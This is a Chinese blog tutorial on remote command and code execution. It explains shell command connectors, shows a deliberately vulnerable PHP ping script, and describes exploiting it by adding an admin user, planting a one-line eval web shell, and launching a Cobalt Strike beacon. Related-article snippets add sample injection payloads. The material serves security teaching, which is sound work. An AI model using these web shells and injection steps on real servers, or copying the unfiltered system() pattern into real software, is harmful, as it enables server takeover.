RCE(远程命令/代码执行)

最新推荐文章于 2024-05-30 08:00:00 发布
最新推荐文章于 2024-05-30 08:00:00 发布
阅读量407 收藏 1
点赞数 1
分类专栏: 网络安全-渗透篇 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Massimo__JAVA/article/details/132091050
版权

一、远程命令(command)执行

原理

系统对用户输入的参数过滤不严,导致用户可以输入&、|、||等命令连接符,拼接并执行命令

利用条件

1、应用调用执行系统命令的函数
2、将用户输入作为系统命令的参数拼接到了命令行中
3、没有对用户输入进行过滤或过滤不严

危害

1、继承Web服务程序的权限去执行系统命令
2、反弹shell
3、控制整个网站甚至控制服务器
4、进一步内网渗透

拼接符

示例含义
cmd1 | cmd2只执行cmd2
cmd1 || cmd2只有当cmd1执行失败后,cmd2才被执行
cmd1 & cmd2先执行cmd1,不管是否成功,都会执行cmd2
cmd1 && cmd2先执行cmd1,cmd1执行成功后才执行cmd2,否则不执行cmd2

Linux系统中支持用分号 (;)执行多个命令,cmd1;cmd2 按顺序依次执行,先执行cmd1再执行cmd2

二、示例

利用代码

<?php
echo system("ping -n 4 ".$_GET['ip']);
?>

方式一:创建用户

访问利用文件,通过 | 等命令拼接符拼接命令,进而创建用户,并添加到管理员组,再通过3389端口远程连接

创建用户
在这里插入图片描述

添加到管理员组
在这里插入图片描述远程连接
在这里插入图片描述在这里插入图片描述

方式二:写入木马文件

通过 | 符号拼接命令,写入一句话木马文件,再通过蚁剑连接

木马文件:

<?php
@eval($_POST['cmd']);
?>

在这里插入图片描述连接
在这里插入图片描述

方式三:CS上线

开启CS服务端
在这里插入图片描述打开CS客户端,生成攻击脚本
在这里插入图片描述
在这里插入图片描述
复制攻击脚本
在这里插入图片描述
拼接脚本命令,并且执行
在这里插入图片描述效果
在这里插入图片描述

三、命令执行与代码执行区别

1、涉及到的函数不同
2、执行的方式不同
命令执行:一般指操作系统命令
远程代码执行:一般指的是脚本代码

Massimo_ycw
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
远程命令代码执行
不想当脚本小子的脚本小子
01-25 667
漏洞成因及原理总结 漏洞成因:脚本语言优点是简洁,方便,但也伴随着一些问题,如速度慢,无法解除系统底层,如果我们开发的应用需要一些除去web的特殊功能时,就需要调用一些外部程序。 命令执行漏洞概念:当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。 命令执行漏洞简介 用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做
用友NC BeanShell远程代码执行
09-07
# 用友NC BeanShell远程代码执行 # CNVD-2021-30167 ## 漏洞描述 用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友 NC bsh.[servlet]...
远程命令执行远程代码执行
ws1813004226的博客
05-22 5233
一、远程命令执行远程代码是怎样形成的? RCE(remote command/code execute)概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而如
RCE代码执行命令执行
最新发布
qq_68163788的博客
05-30 1156
RCE是一种严重的安全漏洞,允许攻击者通过远程方式执行恶意代码命令在受感染的系统上。这种漏洞可以被利用来获取系统权限、窃取敏感数据、篡改网站内容或者在受感染系统上植入后门,从而使攻击者能够完全控制受感染系统。RCE的危害性极高,因为攻击者可以利用这种漏洞对系统进行广泛的破坏,甚至扩大攻击范围至整个网络。 RCE漏洞通常存在于网络应用程序、操作系统或者其他软件中,攻击者可以通过各种方式发现和利用这些漏洞。
RCE(Remote Command/Code Execute;远程命令/代码执行)
今天的风儿甚是喧嚣
07-08 740
RCE介绍及绕过
RCE远程代码命令执行
weixin_54431413的博客
04-01 1828
目录 一、判断操作系统 二、查看页面源代码,有js过滤 三、在请求包中做文章 一、判断操作系统 二、查看页面源代码,有js过滤 三、在请求包中做文章 编辑并重发 得到一个新的response 四、查看key_php得到key ...
RCE远程命令/代码执行
weixin_55666442的博客
04-15 296
pikachu中RCE漏洞的简要笔记
CTFhub-RCE远程代码执行
qq_50605865的博客
04-09 438
1、eval执行 我们进去以后首先进行一个代码审计,发现这里密码cmd非常清晰 OK话不多说连蚁剑 我们看到这样一个文件 右键选择在此处打开终端 接下来就是按部就班的找到flag所在的文件,cat查看即可 2、无过滤的命令注入 先审计代码,嗯雀氏没有过滤 输入127.0.0.1返回结果说明可以进行代码注入,接下来还是按部就班 127.0.0.1;ls 127.0.0.1;cat 。。。。。这里没有返回可能是因为进行了加密 127.0.0.1;cat 。。。。。|base64 得到加密后的字符串 把得到的加
浅析JDWP远程命令执行漏洞 [ Mi1k7ea ]1
08-03
2022/3/2 下午8:30浅析JDWP远程命令执漏洞 [ Mi1k7ea ]https://www.mi1k7ea.com/2021/08/06/浅析JDW
sapConfigServlet_rce:检查 SAP ConfigServlet 未经身份验证的远程代码执行漏洞
06-28
sapConfigServlet_rce 一个简单的python脚本,用于检查SAP ConfigServlet远程未经身份验证的远程代码执行漏洞
泛微e-cology OA Beanshell组件远程代码执行漏洞批量检测脚本
09-26
对2019年9月新爆的泛微e-cology OA Beanshell组件远程代码执行漏洞进行漏洞检测。 使用方法: 1、运行url存活检测脚本e-cology_OA_rce.py批量定位泛微OA业务。 e-cology_OA_rce.py –t 1.txt 2、运行检测脚本判断...
fastjson_rce_tool:fastjson命令执行自动化利用工具,远程执行代码,JNDI服务利用工具RMILDAP
03-31
fastjson_rce_tool java -jar fastjson_tool.jar Usage: java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer 127.0.0.1 80 ...
远程代码命令执行
weixin_41489908的博客
05-31 576
​祝我什么都行,就是别祝我幸福,我要是拿走你的钱财,然后祝你发财,合适么。。。 ---- 网易云热评 1、eval,将字符串当成PHP代码执行 新建php文件,代码如下 eval($_GET['a']); //相当于执行eval(phpinfo()) 访问:http://192.168.139.129/?a=phpinfo(); 2、assert,判断一个表达式是否成立 新一个PHP文件,代码如下 echo(assert($_GET['a']>3)); 传递的参数大于3返..
pikachu RCE--远程命令执行 & 远程代码执行
weixin_44769042的博客
09-12 426
直接干 目录 exec "ping" exec "eval" exec "ping" 介绍: 应用程序有时需要调用一些执行命令的函数,如在PHP里,使用system,exec,shell_exec,passthru,popen,proc_popen等函数可以执行系统命令。当黑客可以控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。 观察ttl,可大致判断目标为 windows系统 利用管道符 | ,让系统执行命令 127.0.0.
命令注入与远程代码执行
u011975363的专栏
07-02 337
远程代码执行:调用服务器网站代码进行执行 命令注入:调用操作系统命令进行执行
RCE远程命令代码执行漏洞)
weixin_42393944的博客
08-10 543
1.理解:可以直接让攻击者向后台服务器远程注入操作命令或者代码,从而控制后台系统 2.区别远程命令执行:直接调用操作系统命令 远程代码执行:靠执行代码调用操作系统命令 3.windows系统命令拼接 <1>"|":管道符,前面命令标准输出,后面命令标准输入 <2>"&": A&B,先运行A后运行B <3>"||": A||B ,运行A命令,若A失败则运行B命令 <4&gt...
远程代码/命令执行漏洞学习(一)
love_wgll的博客
02-23 586
远程代码/命令执行漏洞
远程命令执行漏洞与远程代码执行漏洞33333
zkq001002的博客
10-05 9039
远程命令执行漏洞的原理 远程命令执行漏洞,用户通过浏览器提交执行命令,由于服务器端 没有针对执行函数做 过滤,导致在没有指定绝对路径的情况下就执行命令 复现示例 Tomcat任意文件上传漏洞CVE-2017-12615 介绍 ApacheTomcat服务组件中开启了http的Put方法所造成的攻击者可以利用该方法任意 上传jsp木马所造成的远程代码执行漏洞。 知默认情况下是禁止http请求...
代码执行命令执行区别
weixin_47306547的博客
09-14 2765
代码执行命令执行区别 代码执行本质上是调用后端语言(PHP,JAVA……)来执行特定代码,而命令执行本质是调用系统的命令执行的接口,与对于的不同的语言无关,只与系统的版本有关。 代码执行相关函数 命令执行相关函数 ...
远程代码执行漏洞RCE原理
03-28
远程代码执行漏洞(Remote Code Execution,RCE)是指攻击者通过利用程序或系统中的漏洞,成功地在远程主机上执行自己编写或者上传的恶意代码。攻击者可以利用这个漏洞执行系统命令、上传或下载文件、获取敏感信息等,从而对系统进行攻击。 RCE漏洞的原理是攻击者在程序或系统中注入恶意代码,并且成功执行代码,从而实现攻击目的。攻击者通常利用程序或系统中的安全漏洞,比如未经过滤的用户输入、未授权的访问、缓冲区溢出等进行攻击,通过给予恶意代码执行权限,轻松地控制远程主机。 RCE漏洞的危害非常大,攻击者可以通过该漏洞远程控制系统,获取敏感信息,甚至篡改系统中的数据。因此,对于程序开发人员和系统管理员来说,必须要重视漏洞的防范和修复工作,及时更新补丁,加强安全防护,从而有效地防范远程代码执行漏洞的攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值